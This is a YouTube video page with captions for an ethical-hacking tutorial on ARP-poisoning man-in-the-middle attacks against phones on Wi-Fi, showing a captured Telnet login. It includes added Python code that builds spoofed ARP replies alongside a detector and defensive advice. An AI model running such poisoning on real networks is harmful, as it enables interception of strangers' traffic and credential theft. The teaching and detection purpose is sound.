iPhone and Android WiFi Man-in-the-middle attack // PYTHON Scapy scripts for attacking networks

Video Statistics and Information

Captions
Now, before we get started, this video is not sponsored by a VPN provider. In this video I'm going to show you how to use a Python script to intercept traffic sent from a phone to its default gateway on a Wi-Fi network. In other words, if you went to a coffee shop and you're using their Wi-Fi network, as an example, all your traffic sent to the internet would be captured by my Kali virtual machine or Kali PC, depending on if you're using bare metal or not, with a Python script. Now, there are applications out there that do this, but I want to show you that if you understand Python, if you understand how to write scripts using Python and Scapy, you can do a whole bunch of things. In this series of videos I've shown you how to attack many protocols: I've shown you how to attack EIGRP, BGP, Spanning Tree, a whole bunch of protocols, and this is just another example of that, where I'm attacking ARP. ARP is used on Ethernet networks, ARP is used on Wi-Fi networks. This allows you to run a man-in-the-middle attack where you can see all traffic sent from one device to another on the local segment or the Wi-Fi network.

Now, this script has taken a lot of time and a lot of effort to put together. If you enjoy these types of ethical hacking videos, if you enjoy this type of ethical hacking content, please consider subscribing to my YouTube channel, please like this video and click on the bell to get notifications so that you know when I upload a new video. That really does help me with the YouTube robots. Okay, without further ado, let me show you how you can intercept traffic using the script.

In this example I'm running Kali within a virtual machine on a Windows computer. This Windows laptop is connected to the Wi-Fi network; this iPhone is connected to the same Wi-Fi network. By default, when sending traffic to the internet, as an example, or to another device on the network, the phone is going to send the traffic either to the device directly in the network or to its default gateway. So in this example, if I have a look at my Wi-Fi settings, you can see that I'm using a private MAC address. One of the updates that Apple made to better secure iPhones, as an example, is to use random or private MAC addresses, which change all the time. You can see the IP address of this device is 192.168.1.132; the default gateway, or router, is 192.168.1.249. So if this iPhone was sending traffic to a website such as Facebook or Google or another website, it would send it to that IP address, and to do that it will send an ARP request onto the network requesting the MAC address of this device, and then it will send traffic to that MAC address directly. So for this laptop to see the traffic sent from the iPhone to its default gateway, we're going to run ARP poisoning and poison the ARP cache of both the phone and its default gateway, in other words the router, so that traffic is sent via the laptop to the default gateway. So rather than traffic going directly to its default gateway, the phone will send traffic to the router via this Kali virtual machine.

Now, the script that we're using is fairly complicated, but we've put a lot of comments in the script to make it easier to understand, so hopefully by reading the comments in the script it will make a lot of sense to you. Most of the script is simply comments explaining what each line of code does. One of the things we need to do, as an example, is set up Linux to forward traffic. So when traffic hits the Linux virtual machine, or computer if you're using a physical device, we need to forward that on to the default gateway. So traffic needs to be bridged or forwarded through this virtual machine, and hence we've got the command ipv4 ip_forward equal to one: we want to forward traffic through the virtual machine. There's a whole bunch of other code here; it's a fairly complicated script, but hopefully the comments in the script will make it a lot easier to understand. Now, there are examples online showing you how to run a man-in-the-middle attack using Python and Scapy, but a lot of them don't seem to work properly with devices such as iPhones. So this works with an iPhone and various other devices; we were able to intercept all traffic for all devices that we tested. Let me know if it works for you.

Now, as always, a warning: what I'm sharing here is for educational purposes only. Please do not use the script in Starbucks or some other Wi-Fi network and get into trouble. You should only use scripts such as these or other ethical hacking tools ethically, so only test this on Wi-Fi networks that you own, only test this on Wi-Fi networks that you have permission to attack. In this example I'm using my own Wi-Fi network, so all the devices that I'm using here are devices that I own: my iPhone, my laptop, my Wi-Fi network. I need to say this, unfortunately, just to be on the safe side. So, disclaimer: this is for educational purposes only. Do not go out there and get into trouble, don't do something that you shouldn't do, make sure that you only test this on networks that you own or have permission to attack.

Okay, so once again I've put a lot of comments in the code here. I'm not going to explain every single line of code because that'll take a long time. So what I'll do is copy the script. In Kali, this is running within a virtual machine. I'll go to manage virtual machine settings, and what you'll see is I've bridged the network adapter to the Wi-Fi network within this laptop. This laptop is only connected to the Wi-Fi network; it's connected to no other networks. Okay, so in Kali I'll open up a terminal and I'll create a script called arp1hack.py, I'll paste that script in, Ctrl+X, and I'll save that script. Now, notice the format of the command that you need to use; if you don't do that you'll be prompted to use the right command. So as an example, if I just type python3 arp1hack.py, the script's going to tell us that we need to use sudo when running this command. So we've tried to add a lot of help information to make it easier to run the script, and notice we're told there that we need a valid IP range. So the correct format for my local network is going to be this command: sudo python3, the script name (whatever you decide to call that), dash IP range, and the range that you're going to use. So I'll paste that in; this is my local subnet. You can see that once again on the iPhone 192.168.1.132 is the IP address, you can see the subnet mask 255.255.255.0, so a /24 mask; the router is 192.168.1.249. So I'll press Enter. Scrolling up, there's the command that we used. We can see that the subnet that's going to be checked is 192.168.1.0/24; that's a valid range. Linux forwarding of traffic has been enabled, we've got a little banner here, and then it shows us various MAC addresses and IP addresses that have been discovered in the network. Okay, so the IP address of this device is 192.168.1.132, that's this device, and the MAC address has been correctly discovered. The MAC address here is be:87:55:ce:46:df, so that's the private MAC address that's been discovered. So I'm going to use the command 25 because that's the device that I want to intercept, so traffic for 25, and we're told that information has been written to a pcap file.

What I'll do now is run Wireshark and see what traffic we capture. So I'll get Wireshark to run. You can see a whole bunch of traffic is being intercepted, but for this test I'll use Telnet. Now, one of the problems with man-in-the-middle attacks is that a lot of traffic today is actually encrypted, but just to prove the point I'm going to use Telnet, which is clear text, and I'm going to connect to the router. As you can see, traffic is already being captured, and if we look at the Wireshark capture we can see the actual Telnet information. So hopefully what we'll see is a prompt, and there you go: username verification. That's what we see on the phone, and we're asked to enter our username. I'll enter the username here, which is peter, and I'll enter a password of cisco. This is a Cisco router; obviously you don't want to use a password like that. show version will show us the version of operating system that this router is using. That has all been captured by Wireshark running within Kali within a virtual machine on this Windows laptop; traffic is being sent via that laptop. Now, can we see the username? We can see here that we are prompted for a username, and we can see p-e-t-e-r as a username, and then we can see the password prompt, and then we can see the password of cisco displayed there. Now, that's not so easy to read, so I'll right-click and then say Follow TCP Stream, and what we can see now is the whole TCP stream. Now, what you'll notice is the username is repeated, and that's because we are capturing traffic from the phone to the router and then from the router back to the phone, so we see both the packet that was sent, p, and the echo. So what you may notice is there's different colors here: we've got blue and red. So p is being sent to the router, and then red is the echo back. So we've got the username peter; the password wasn't echoed back by the router, so we see the password just once, cisco, and then we see the output of the router. Now, this is my real home router, so I won't type every command that's possible and show you the passwords etc. of my real accounts; this is just a quick fake account. But show ip interface brief shows me the interfaces on this router, and once again if I type Follow TCP Stream I should see all the information about the version of operating system that the router is using, plus, here we go, show ip interface brief and the interfaces on the router. I have successfully been able to capture traffic from this phone to the router on the local segment.

So this is an ARP attack: traffic from the phone to the router is going through the Kali virtual machine, and let's just prove that. I'll connect to the router directly and I'll log in with my proper username, david. show arp will show us the ARP cache on the router, and if we look for 192.168.1.132, which is the phone, what you'll notice is the MAC address of the phone is different to the MAC address that the router is seeing. So the ARP cache of the router is saying that this IP address uses this MAC address, but that's actually not the MAC address of the phone. So to prove this, let's stop our script: I'll press Ctrl+C to break the script, and then on the router show arp, and I'll just include 132. That MAC address should change to this MAC address. So what I'll do is open up a browser and go to a website such as kali.org. Now, it may take a while for the ARP cache to time out; notice it's still using the old MAC address. If I type clear arp, and let's just press Enter there, show arp | include 132, notice the MAC address is updated. Now it's showing the correct MAC address of be... ending in df. ARP caches can take a while to be flushed and to be updated, but in that example notice the MAC address has successfully updated. But let's run the script again, and we want to do 132, so in this case it's 24. On the router, notice the MAC address has changed, so the router is no longer sending traffic to the MAC address of the phone; it's sending it to the MAC address of the Kali virtual machine.

Okay, so there you go. I've now shown you how to poison the ARP caches of devices in your network to run a man-in-the-middle attack, so that a Kali virtual machine can capture all the traffic sent from a phone to its default gateway. Now, this will apply to traffic sent to the internet. The problem that you're going to encounter is that a lot of traffic sent from a device to the internet is encrypted. We typically use HTTPS or SSL these days, or other encrypted protocols, so even if you capture the traffic using a man-in-the-middle attack, it doesn't mean that you're going to be able to read all the traffic sent to the internet, because the traffic is encrypted. And this is why you have to be careful with some of the advertising of VPNs that you see on the internet. Some people say you should use a VPN because you need to be protected when you're in a cafe and you're using the Wi-Fi hotspot. There's some truth in that, because I am capturing the traffic, but the traffic is encrypted, so a VPN doesn't always help you, because generally traffic today is encrypted. Very few websites today are using HTTP; most are using HTTPS. You don't want to connect to websites that are using HTTP or use protocols such as Telnet, which are clear text; you want to use SSH or HTTPS or encrypted protocols. Now, a VPN can give you an added level of protection, if you like, because you're now sending SSL down a VPN connection. It's all about trust: do you trust the Wi-Fi network, do you trust that there won't be people like me hanging around trying to intercept your traffic, or do you trust the VPN provider? I think for a lot of us we would prefer to trust a VPN provider, some of the big ones, and send our traffic to a VPN provider rather than just using the Wi-Fi network with no added protection. But be aware that traffic is encrypted, so these man-in-the-middle attacks aren't as potent or as powerful as they used to be.
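The attack the video walks through, as an added worked example that is not the channel's Scapy script: the two unsolicited ARP replies that put the Kali VM between the phone and the router (one telling the phone "the gateway is at my MAC", one telling the router "the phone is at my MAC"), written out to a pcap, and then the check the video did by hand with `show arp | include 132`, implemented as a detector that flags any IP whose MAC binding changes. It is plain Python with no Scapy dependency, so the frames are built byte-by-byte and nothing is sent on the wire. The phone IP 192.168.1.132, the gateway 192.168.1.249 and the phone MAC be:87:55:ce:46:df come from the video; the gateway MAC and the Kali VM's MAC are constructed placeholders, as is the pcap file name.

```python
"""ARP cache poisoning frames and a matching detector, in plain Python.

Added example (not the video's Scapy script). Builds the two unsolicited ARP
replies an attacker sends to sit between a phone and its default gateway,
serialises them in pcap format, and then parses that pcap to flag the
IP-to-MAC change the video verified by hand with "show arp" on the router.
"""
import ipaddress
import struct

ETH_P_ARP = 0x0806            # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2

# Phone IP, gateway IP and phone MAC are those shown in the video; the
# gateway MAC and the attacker (Kali VM) MAC are constructed for this example.
PHONE_IP, PHONE_MAC = "192.168.1.132", "be:87:55:ce:46:df"
GATEWAY_IP, GATEWAY_MAC = "192.168.1.249", "00:11:22:33:44:55"
ATTACKER_MAC = "08:00:27:aa:bb:cc"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying the ARP reply 'sender_ip is at sender_mac'."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet(1), ptype=IPv4(0x0800), hlen=6, plen=4, opcode=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp  # 14-byte Ethernet header + 28-byte ARP body = 42 bytes


def poison_pair(attacker_mac: str, victim_mac: str, victim_ip: str,
                gateway_mac: str, gateway_ip: str) -> list:
    """The two frames that put the attacker in the middle: the victim learns
    'gateway is at attacker', the gateway learns 'victim is at attacker'.
    Both caches must be poisoned (and re-poisoned before they age out) or only
    one direction flows through the attacker; ip_forward must be on as well."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
        build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),
    ]


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


def pcap_bytes(frames, link_type: int = 1) -> bytes:
    """Serialise frames as a classic little-endian pcap (DLT_EN10MB)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, link_type)
    for i, f in enumerate(frames):  # ts_sec, ts_usec, incl_len, orig_len
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


def parse_pcap(data: bytes) -> list:
    """Inverse of pcap_bytes: return the raw frames of a little-endian pcap."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic != 0xA1B2C3D4:
        raise ValueError("unsupported pcap magic %#x" % magic)
    frames, pos = [], 24
    while pos + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack("<IIII", data[pos:pos + 16])
        frames.append(data[pos + 16:pos + 16 + incl_len])
        pos += 16 + incl_len
    return frames


def detect_arp_changes(frames, known=None):
    """Track IP -> MAC from ARP replies and report every binding that changes.
    Seeded with the router's real table, this flags exactly what the video
    showed: .132 and .249 suddenly 'at' the Kali VM's MAC."""
    table, alerts = dict(known or {}), []
    for f in frames:
        arp = parse_arp(f)
        if not arp or arp["op"] != ARP_REPLY:
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if ip in table and table[ip] != mac:
            alerts.append((ip, table[ip], mac))
        table[ip] = mac
    return table, alerts


if __name__ == "__main__":
    frames = poison_pair(ATTACKER_MAC, PHONE_MAC, PHONE_IP, GATEWAY_MAC, GATEWAY_IP)
    with open("arp_poison_example.pcap", "wb") as fh:   # constructed file name
        fh.write(pcap_bytes(frames))
    _, alerts = detect_arp_changes(parse_pcap(pcap_bytes(frames)),
                                   known={PHONE_IP: PHONE_MAC, GATEWAY_IP: GATEWAY_MAC})
    for ip, old, new in alerts:
        print(f"ALERT {ip}: {old} -> {new}")
```

A real poisoner would push these frames out of a raw socket as root, repeat them every few seconds because ARP entries age out (the video shows the router's entry reverting once the script stops and `clear arp` is run), and re-announce the true bindings on Ctrl+C so the victims are not left without a gateway. On the defensive side, the same binding-change check is what a managed switch performs with Dynamic ARP Inspection against its DHCP snooping table; on a network you cannot reconfigure, a static ARP entry for the gateway on the client removes the phone-side half of the attack.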
Info
Channel: David Bombal
Views: 171,379
Keywords: python, scapy, arp, arp mitm, arp mitm attack, iphone, apple, android, samsung, android phone, ios, apple ios, apple iphone, kali linux, ceh, oscp, wifi hacking, ethical hacking, scapy python, scapy python3, public wifi, python scapy, kali linux python, scapy sniffing, arp spoofing, arp poisoning, man in the middle, scapy python pcap, wireshark, scapy in python, scapy python script, scapy python sniff, man in the middle attack, arp spoofing attack, arp spoofing linux, cisco, ccna
Id: O1jpck31Ask
Length: 15min 23sec (923 seconds)
Published: Fri Nov 12 2021